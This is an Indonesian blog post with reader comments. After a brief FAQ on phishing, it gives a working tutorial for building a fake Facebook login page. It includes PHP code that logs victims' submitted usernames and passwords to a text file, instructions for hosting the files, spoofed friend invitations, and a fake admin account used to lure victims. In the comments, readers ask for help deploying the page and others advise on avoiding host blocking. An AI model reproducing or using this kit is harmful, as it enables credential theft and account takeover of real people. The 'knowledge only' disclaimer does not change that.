// Rizky-xp
// On-Thursday, 6 January 2011
INI HANYA SEKEDAR PENGETAHUAN BAGI ANDA
JANGAN DISALAH GUNAKAN
==========
F.A.Q PHISING:
==========
I.
Phising , adalah tindakan memperoleh informasi pribadi seperti User ID, PIN,
nomor rekening bank, nomor kartu kredit Anda secara tidak sah. Informasi ini kemudian akan dimanfaatkan oleh pihak penipu untuk mengakses rekening, melakukan penipuan kartu kredit atau memandu nasabah untuk melakukan transfer ke rekening tertentu dengan iming-iming hadiah
II.
Bagaimana phishing dilakukan?
Teknik umum yang sering digunakan oleh penipu adalah sebagai berikut:
* Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan user sehingga user terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; facebook, yahoo, bank atau penerbit lainnya. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit
* Membuat situs palsu yang sama persis dengan situs resmi atau pelaku phishing mengirimkan e-mail yang berisikan link ke situs palsu tersebut.
* Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim.
III.
Mencegah phishing
Jangan mudah terpancing untuk mengikuti arahan/petunjuk apapun sehubungan informasi data, rekening atau informasi penting lainnya, yang dianjurkan pada e-mail yang dilink ke situs tertentu. Jika Anda menerima e-mail sejenis ini dan mengatasnamakan Lembaga tertentu yang mencurigakan atau ASPAL, berhati-hatilah.
=============================
Cara Membuat Perangkap Penyadapan [Phising]
=============================
1. buka http://www.facebook.com/login.php,
lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote) dan kita akan memulai editingnya.
pada action="https://login.facebook.com/login.php" ubahlah menjadi action="next.php"
kemudian ubah juga methode dari "POST" menjadi "get"
simpan notepad ini menjadi index.php (jangan html)
2. buka notepad baru isikan kode berikut :
Code: Select all
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
--> Simpan sebagai next.php
3. Buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt.
Upload 3 file tersebut "index.php, next.php, pass.txt" kedalam hosting misalnya 110mb.com, spam.com atau 007sites.com.
Lalu Upload 3 File Tadi Ke Hosting Anda Dan Catat Alamat Hosting Anda
kasih poison chmod 777 pada pass.txt ini sangat penting
Misal: www.facebookhackcom
OK, Kamu sudah punya phising page facebook sekarang.
4. Langkah-langkah spoofing.
copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"
ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu. Phising siap dikirim ke korban kamu.
5.Buat Account FB baru Beri Nama Yg Menyerupai Staff FB Misal
AdminFB
selesai cari korban anda dan kirimkan Pesan Login Ulang Ke Korban Tentunya Url Nya Arahkan ke Hosting Anda Dan Ketika Si Korban Membaca Pesan Tersebut Dia Akan Mengklik Halaman Hosting Anda Dan Dia Login Kembali Lewat Hosting Anda dan Ketika Dia Mencet Tombol Login Tereennng
Semua ID & PASSWORD korban Telat Dicatat Ke Daalam hosting Anda (pass.txt)
Semua yang anda pelajari dan yang anda lakukan secara otomatis sudah menjadi TANGGUNG JAWAB anda Sepenuhnya, Seluruhnya, dan Seutuhnya.
+++++++++
salam'
spoofing itu bagaimana maksudnya ??
ReplyDeleteOooh Yang Itu Lewatin AjaGk Penting
ReplyDeleteoke deh....
ReplyDeleteupload file ke 000webhost.com gmna ??
biar domainnya lebih meyakinkan !!
.com
Erik Ya bIsa aja di 000webhost.com
ReplyDeleteTapi Kaya nya FB dah menyadari tentang Adanya Phising ini
jadi klo kmu pke yg free kamu akan di blokir 000webhost.com Karena Meng upload File Tersebut Coba Aja Klo Ga Percaya
Jadi Biar Gak Di Blog qmu harus nyari hosting yang berbayar biar gak di blokir gk mungkin kan kita bayar di blokir nanti orang jera lagi nyewa hosting mereka
permisi, maksudnya action= itu gmna yah mas?
ReplyDeletephising memang cara yang jitu. Tapi unutuk menjebak tidaklah mudah. Ada cara yang instan kok dengan phising.
ReplyDeleteItu menurut saya '.'
wah, ternyata ada juga tutor nya ini ya. hehe
ReplyDeletehebat boy . Tp sepertinya ada yang kurang tuh. hehehehe
CARA UPLOAD "3. Buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt.
ReplyDeleteUpload 3 file tersebut "index.php, next.php, pass.txt" kedalam hosting misalnya 110mb.com, spam.com atau 007sites.com.
Lalu Upload 3 File Tadi Ke Hosting Anda Dan Catat Alamat Hosting Anda" INI GIMANA BOS???
GWE UDAH LAKUIN CARA 1 MA NOMER 2 TAPI YG NOMER 3 MAH GAK DIJELASIN CARA UPLOAD AND NGATURNYA
APA LAGI ADA
-Title *
-Tips
-Servings
TOLONG DIJELASIN SECARA DETAIL BOS.....TERIMA KASIH
hmm
ReplyDeletecara nxa mudah ajja qmu tinggal arah kan korban ke alamat hosting kamu
misal aqu nih pake kumpul-forum.ueuo.com
trus khan tadi 3 file nxa udah di uplod neh
nah tinggal kta sebarin ajja http://kumpul-forum.ueuo.com
ke korban nxa
cara nxa terserah kalian masing masing bisa bikin fb baru dengan nama yg ampir mirip admin fb kek buat ngirim pesan palsu ke korban
ngerti gk
moga aja dah ngerti
poison chmod 777 pada pass.txt.. ni mksudny gmn Gann????
ReplyDeletenih scren shout nya aku kasih
ReplyDelete1.http://i54.tinypic.com/1ramx2.jpg
2.http://i51.tinypic.com/25i822p.jpg
oh iya untuk tambahan langkah spoofing itu membuat tiruan undangan dari facebook
ReplyDeletetapi kita yang ngirim bukan fb
untuk catatan apabila kita menggunakan hosting gratisan dan meng upload script di atas sangat beresiko
ReplyDeletebisanya hosting gratisan tidak memperblohkan nya ada script seperti di atas